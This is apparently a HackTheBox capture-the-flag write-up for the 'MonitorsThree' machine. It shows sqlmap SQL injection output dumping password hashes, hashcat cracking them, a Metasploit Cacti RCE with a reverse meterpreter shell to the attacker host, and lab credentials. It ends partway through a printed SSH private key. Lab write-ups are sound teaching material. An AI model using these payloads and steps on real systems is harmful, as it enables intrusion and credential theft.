MonitorsThree

Synopsis

MonitorsThree is a medium linux machine created by ruycr4ft and kavigihan. The http service hosts the monitorsthree.htb domain. The vhost cacti.monitorsthree.htb uses the cacti version 1.2.26 which is vulnerable to CVE-2024-25641 arbitrary file write vulnerability. The domain has forget-password.php which is vulnerable to sql injection and the cacti login credentials is gained. CVE-2024-25641 is exploited using the gained credentials which gives us a shell as www-data. The cacti config file has a mysql crediantials. Logging into the mysql database gives us the marcus user password, we change the user to marcus and fetch the id_rsa for ssh login. The marcus runs the duplicati service in port 8200, we can bypass the duplicati login and exploit to gain the shell as root.

OS	Difficulty	Points	Release Date	Retired Date
Linux	Medium	30	24-08-2024	18-01-2025

---

OSINT

Previous Machines

The previously released Monitors and MonitorsTwo machinces are vulnerable to sql injection and command injection, the vhost cacti or domain uses the cacti service and the user marcus is present.

Monitors

https://www.hackthebox.com/machines/monitors

MonitorsTwo

https://www.hackthebox.com/machines/monitorstwo

---

Enumeration

Nmap

Started the nmap scan and found the ssh and http services running.

nmap -Pn -sC -sV --min-rate=500 10.10.11.30 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 19:56 EST
Nmap scan report for 10.10.11.30
Host is up (1.9s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.60 seconds

Add the monitorsthree.htb and cacti.monitorsthree.htb into /etc/hosts file.

Web - monitorsthree.htb

The monitorsthree provides the networking solutions to the businesses.

The login page provides us the login form and forget password form is vulnerable to sql injection. It is also conformed that the user admin is present because the password reset instruction is send successfully. The payload I have used for identifying the sql injection is given below.

admin'OR'1'='1

The syntax error conforms that the database is MariaDB database.

Web - cacti.monitorsthree.htb

The vhost cacti is present and it is using cacti version 1.2.26 which is vulnerable to CVE-2024-25641 and can be exploited using metasploit once we get the cacti login credentials.

---

Exploit

SQL Injection - forget-password

The sql injection found in domain is exploited using sqlmap for gaining cacti login credentials.

• Intercept the forget password request using burpsuite.

• Copy and paste the request into the file.

DBS enumeration

sqlmap -r request.txt --batch --dbs 
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:40:43 /2025-01-14/

[07:40:43] [INFO] parsing HTTP request from 'request.txt'
[07:40:43] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[07:40:55] [INFO] testing if the target URL content is stable
[07:41:04] [WARNING] POST parameter 'username' does not appear to be dynamic
[07:41:14] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[07:41:23] [INFO] testing for SQL injection on POST parameter 'username'
[07:41:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:42:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:42:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:42:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:43:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:44:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:45:10] [INFO] testing 'Generic inline queries'
[07:45:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:45:19] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                                                                           
[07:45:25] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[07:46:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:46:50] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:47:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:49:04] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:49:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:49:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:51:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8237 FROM (SELECT(SLEEP(5)))WsJa) AND 'uTpu'='uTpu
---
[07:53:45] [INFO] the back-end DBMS is MySQL
[07:53:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:54:15] [INFO] fetching database names
[07:54:15] [INFO] fetching number of databases
[07:54:15] [INFO] retrieved: 2
[07:55:49] [INFO] retrieved: information_schema
[08:34:47] [INFO] retrieved: monit
[08:49:33] [ERROR] invalid character detected. retrying..
orsthree_db
available databases [2]:
[*] information_schema
[*] monitorsthree_db

[09:13:10] [INFO] fetched data logged to text files under '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb'

[*] ending @ 09:13:10 /2025-01-14/

User Table Dumping

sqlmap -r request.txt --batch -T users -C username,password -D monitorsthree_db --time-sec=10 --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:00:24 /2025-01-15/

[03:00:24] [INFO] parsing HTTP request from 'request.txt'
[03:00:24] [INFO] resuming back-end DBMS 'mysql' 
[03:00:24] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8237 FROM (SELECT(SLEEP(10)))WsJa) AND 'uTpu'='uTpu
---
[03:00:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:00:38] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'monitorsthree_db'
[03:00:38] [INFO] fetching number of column(s) 'password,username' entries for table 'users' in database 'monitorsthree_db'
[03:00:38] [INFO] resumed: 4
[03:00:38] [INFO] resumed: 1e68b6eb86b45f6d92f8f292428f77ac
[03:00:38] [INFO] resumed: janderson
[03:00:39] [INFO] resumed: 31a181c8372e3afc59dab863430610e8
[03:00:39] [INFO] resuming partial value: admi
[03:00:39] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                                       
[03:06:59] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[03:07:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
n
[03:13:20] [INFO] retrieved: 633b683cc128fe244
[04:22:44] [ERROR] invalid character detected. retrying..
b
[04:30:04] [ERROR] invalid character detected. retrying..
^C^C
[04:33:13] [WARNING] Ctrl+C detected in dumping phase                                                                                                                       
[04:33:13] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[04:33:13] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:33:13] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[04:33:13] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:33:13] [INFO] starting 8 processes 
[04:33:18] [WARNING] no clear password(s) found                                                                                                                             
Database: monitorsthree_db
Table: users
[2 entries]
+-----------+----------------------------------+
| username  | password                         |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f292428f77ac |
| admin     | 31a181c8372e3afc59dab863430610e8 |
+-----------+----------------------------------+

[04:33:18] [INFO] table 'monitorsthree_db.users' dumped to CSV file '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb/dump/monitorsthree_db/users.csv'
[04:33:18] [INFO] fetched data logged to text files under '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb'

[*] ending @ 04:33:18 /2025-01-15/

I have termited the sqlmap during user dumping when I have extracted the admin hash.

The admin hash is crack-able using hashcat and rockyou.txt. It gives us the credentials for cacti.

hashcat -a 0 -m 0 31a181c8372e3afc59dab863430610e8 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

31a181c8372e3afc59dab863430610e8:greencacti2001           
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 31a181c8372e3afc59dab863430610e8
Time.Started.....: Wed Jan 15 04:37:07 2025 (2 secs)
Time.Estimated...: Wed Jan 15 04:37:09 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5462.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7786496/14344385 (54.28%)
Rejected.........: 0/7786496 (0.00%)
Restore.Point....: 7782400/14344385 (54.25%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: grega1987tomazin -> green3484
Hardware.Mon.#1..: Temp: 57c Util: 32%

Started: Wed Jan 15 04:37:06 2025
Stopped: Wed Jan 15 04:37:10 2025

The crediantials for cacti is admin:greencacti2001

Foothold

Shell - www-data

The gained crediantials can be used for CVE-2024-25641 vulnerability. Use the metasploit for exploiting the vulnerability. The more details about the CVE is found here.

CVE-2024-25641 : Cacti provides an operational monitoring and fault management framework. Prior tcvedetails

sudo msfdb run
[sudo] password for dexter: 

[msf](Jobs:0 Agents:0) >> use exploit/multi/http/cacti_package_import_rce
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> show options

Module options (exploit/multi/http/cacti_package_import_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /cacti           yes       The base URI of Cacti
   USERNAME   admin            yes       User to login with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set PASSWORD greencacti2001
PASSWORD => greencacti2001
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set RHOSTS tun0
RHOSTS => tun0
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set RHOSTS 10.10.11.30
RHOSTS => 10.10.11.30
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set LHOST tun0
LHOST => 10.10.16.17
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set LPORT 8443
LPORT => 8443
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set VHOST cacti.monitorsthree.htb
VHOST => cacti.monitorsthree.htb
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> exploit
[*] Started reverse TCP handler on 10.10.16.17:8443 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `greencacti2001`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (40004 bytes) to 10.10.11.30
[+] Deleted /var/www/html/cacti/resource/WjGjZHBPj.php
[*] Meterpreter session 1 opened (10.10.16.17:8443 -> 10.10.11.30:46276) at 2025-01-14 20:47:43 -0500

(Meterpreter 1)(/var/www/html/cacti/resource) >

---

Privilege Escalation

Pillaging - www-data [user]

The www-data has a cacti config file which contains the password for mysql and the auth_user table contains the user marcus hash which is crackable using rockyou.txt wordlist.

Config File

(Meterpreter 1)(/var/www/html/cacti/resource) > cd ../include
(Meterpreter 1)(/var/www/html/cacti/include) > cat config.php
----- SNIP -----
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;
----- SNIP -----
(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 15797 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'

auth_user

(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 15797 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@monitorsthree:~/html/cacti/include$ mysql -u cactiuser -p cacti
mysql -u cactiuser -p cacti
Enter password: cactiuser

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 21843
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [cacti]> USE cacti;
USE cacti;
Database changed
MariaDB [cacti]> SHOW TABLES;
SHOW TABLES;
+-------------------------------------+
| Tables_in_cacti                     |
+-------------------------------------+
| aggregate_graph_templates           |
| aggregate_graph_templates_graph     |
| aggregate_graph_templates_item      |
| aggregate_graphs                    |
| aggregate_graphs_graph_item         |
| aggregate_graphs_items              |
| automation_devices                  |
| automation_graph_rule_items         |
| automation_graph_rules              |
| automation_ips                      |
| automation_match_rule_items         |
| automation_networks                 |
| automation_processes                |
| automation_snmp                     |
| automation_snmp_items               |
| automation_templates                |
| automation_tree_rule_items          |
| automation_tree_rules               |
| cdef                                |
| cdef_items                          |
| color_template_items                |
| color_templates                     |
| colors                              |
| data_debug                          |
| data_input                          |
| data_input_data                     |
| data_input_fields                   |
| data_local                          |
| data_source_profiles                |
| data_source_profiles_cf             |
| data_source_profiles_rra            |
| data_source_purge_action            |
| data_source_purge_temp              |
| data_source_stats_daily             |
| data_source_stats_hourly            |
| data_source_stats_hourly_cache      |
| data_source_stats_hourly_last       |
| data_source_stats_monthly           |
| data_source_stats_weekly            |
| data_source_stats_yearly            |
| data_template                       |
| data_template_data                  |
| data_template_rrd                   |
| external_links                      |
| graph_local                         |
| graph_template_input                |
| graph_template_input_defs           |
| graph_templates                     |
| graph_templates_gprint              |
| graph_templates_graph               |
| graph_templates_item                |
| graph_tree                          |
| graph_tree_items                    |
| host                                |
| host_graph                          |
| host_snmp_cache                     |
| host_snmp_query                     |
| host_template                       |
| host_template_graph                 |
| host_template_snmp_query            |
| plugin_config                       |
| plugin_db_changes                   |
| plugin_hooks                        |
| plugin_realms                       |
| poller                              |
| poller_command                      |
| poller_data_template_field_mappings |
| poller_item                         |
| poller_output                       |
| poller_output_boost                 |
| poller_output_boost_local_data_ids  |
| poller_output_boost_processes       |
| poller_output_realtime              |
| poller_reindex                      |
| poller_resource_cache               |
| poller_time                         |
| processes                           |
| reports                             |
| reports_items                       |
| rrdcheck                            |
| sessions                            |
| settings                            |
| settings_tree                       |
| settings_user                       |
| settings_user_group                 |
| sites                               |
| snmp_query                          |
| snmp_query_graph                    |
| snmp_query_graph_rrd                |
| snmp_query_graph_rrd_sv             |
| snmp_query_graph_sv                 |
| snmpagent_cache                     |
| snmpagent_cache_notifications       |
| snmpagent_cache_textual_conventions |
| snmpagent_managers                  |
| snmpagent_managers_notifications    |
| snmpagent_mibs                      |
| snmpagent_notifications_log         |
| user_auth                           |
| user_auth_cache                     |
| user_auth_group                     |
| user_auth_group_members             |
| user_auth_group_perms               |
| user_auth_group_realm               |
| user_auth_perms                     |
| user_auth_realm                     |
| user_auth_row_cache                 |
| user_domains                        |
| user_domains_ldap                   |
| user_log                            |
| vdef                                |
| vdef_items                          |
| version                             |
+-------------------------------------+
113 rows in set (0.001 sec)

MariaDB [cacti]> SELECT * FROM user_auth;
SELECT * FROM user_auth;
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| id | username | password                                                     | realm | full_name     | email_address            | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
|  1 | admin    | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |     0 | Administrator | marcus@monitorsthree.htb |                      |                 | on        | on        | on           | on             |          2 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 | -1               |        |               0 |        0 |   436423766 |
|  3 | guest    | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |     0 | Guest Account | guest@monitorsthree.htb  |                      |                 | on        | on        | on           |                |          1 |             1 |            1 |            1 |                      1 |         |         -1 |        -1 | -1               |        |               0 |        0 |  3774379591 |
|  4 | marcus   | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |     0 | Marcus        | marcus@monitorsthree.htb |                      | on              | on        | on        | on           | on             |          1 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 |                  |        |               0 |        0 |  1677427318 |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
3 rows in set (0.000 sec)

MariaDB [cacti]> 

Shell - marcus

Crack the hash using the hashcat.

hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK:12345678910
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: hash
Time.Started.....: Tue Jan 14 22:34:55 2025 (6 mins, 4 secs)
Time.Estimated...: Fri Jan 17 09:02:00 2025 (2 days, 10 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      136 H/s (7.20ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/3 (33.33%) Digests (total), 1/3 (33.33%) Digests (new), 1/3 (33.33%) Salts
Progress.........: 73792/43033155 (0.17%)
Rejected.........: 0/73792 (0.00%)
Restore.Point....: 24576/14344385 (0.17%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:256-272
Candidate.Engine.: Device Generator
Candidates.#1....: 280690 -> 020693
Hardware.Mon.#1..: Temp: 85c Util: 92%

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => q

                                                          
Session..........: hashcat
Status...........: Quit
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: hash
Time.Started.....: Tue Jan 14 22:34:55 2025 (6 mins, 27 secs)
Time.Estimated...: Fri Jan 17 08:56:25 2025 (2 days, 10 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      137 H/s (7.10ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/3 (33.33%) Digests (total), 1/3 (33.33%) Digests (new), 1/3 (33.33%) Salts
Progress.........: 78656/43033155 (0.18%)
Rejected.........: 0/78656 (0.00%)
Restore.Point....: 26176/14344385 (0.18%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:640-656
Candidate.Engine.: Device Generator
Candidates.#1....: 241987 -> 100785
Hardware.Mon.#1..: Temp: 85c Util: 94%

Started: Tue Jan 14 22:34:14 2025
Stopped: Tue Jan 14 22:41:23 2025

The password cannot be used for ssh login as marcus but we can change the user to marcus using the su from the previously gained shell and copy the id_rsa file to ssh into it.

SSH Login Try

ssh marcus@10.10.11.30
The authenticity of host '10.10.11.30 (10.10.11.30)' can't be established.
ED25519 key fingerprint is SHA256:1llzaKeglum8R0dawipiv9mSGU33yzoUW3frO9MAF6U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.30' (ED25519) to the list of known hosts.
marcus@10.10.11.30: Permission denied (publickey).

Getting id_rsa

(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 16195 created.
Channel 1 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@monitorsthree:~/html/cacti/include$ su marcus
su marcus
Password: 12345678910

marcus@monitorsthree:/var/www/html/cacti/include$ cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
